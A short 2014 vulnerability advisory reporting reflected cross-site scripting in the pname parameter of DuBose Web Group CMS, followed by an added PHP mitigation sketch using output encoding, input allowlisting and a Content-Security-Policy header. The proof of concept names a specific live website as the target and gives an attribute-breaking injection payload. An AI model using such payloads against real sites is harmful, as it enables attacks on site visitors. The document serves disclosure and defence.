# Cross-Site Scripting on DuBose Web Group CMS
# Risk: Low
# CWE number: CWE-79
# Date: 19/04/2014
# Vendor: www.duboseweb.com
# Author: Felipe Gabriel Renzi
# Contact: renzi@linuxmail.org
# Tested on: Windows 8 Pro
# Vulnerable File: product.php
# Exploit: http://host/path/product.php?pname=[xss]
# PoC:
- Target: http://www.palmettopropane.com
- Vuln. File: /Residential/product.php?pname=
- Exploit: "><marquee>Vulnerable</marquee>
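
Mitigation sketch for the pname reflection reported above, added here as an example and not taken from the vendor's product.php, whose source the advisory does not show. It assumes the value is echoed inside a double-quoted HTML attribute, as the leading "> in the PoC suggests; the helper names h() and clean_pname() and the allowlist policy are hypothetical.

```php
<?php
// Added example, not the vendor's code. Assumed vulnerable pattern:
//     echo '<input name="pname" value="' . $_GET['pname'] . '">';
// A raw double quote in pname closes the attribute, and the markup that
// follows it is then parsed by the browser as part of the page.

// Hypothetical helper: encode for HTML text and quoted-attribute contexts.
function h(string $value): string
{
    // ENT_QUOTES encodes both " and ', so the value cannot close the attribute.
    // ENT_SUBSTITUTE replaces invalid UTF-8 instead of returning an empty string.
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Hypothetical helper: accept only what a product name plausibly contains.
function clean_pname($raw): ?string
{
    if (!is_string($raw)) {
        return null; // rejects array input such as pname[]=x
    }
    $raw = trim($raw);
    // Assumed policy: letters, digits, space and a little punctuation, max 80 chars.
    $ok = preg_match('/^[\p{L}\p{N} .,&()\'-]{1,80}$/u', $raw) === 1;
    return $ok ? $raw : null;
}

$pname = clean_pname($_GET['pname'] ?? null);
if ($pname === null) {
    http_response_code(400);
    exit('Invalid product name');
}

header('Content-Type: text/html; charset=UTF-8');
// Defence in depth: inline and third-party script is refused even if some
// other output path on the page is missed.
header("Content-Security-Policy: default-src 'self'");
?>
<input type="hidden" name="pname" value="<?= h($pname) ?>">
<h1><?= h($pname) ?></h1>
```

The allowlist still permits & and ', so the encoding at output remains the control that matters; validation only narrows what reaches it.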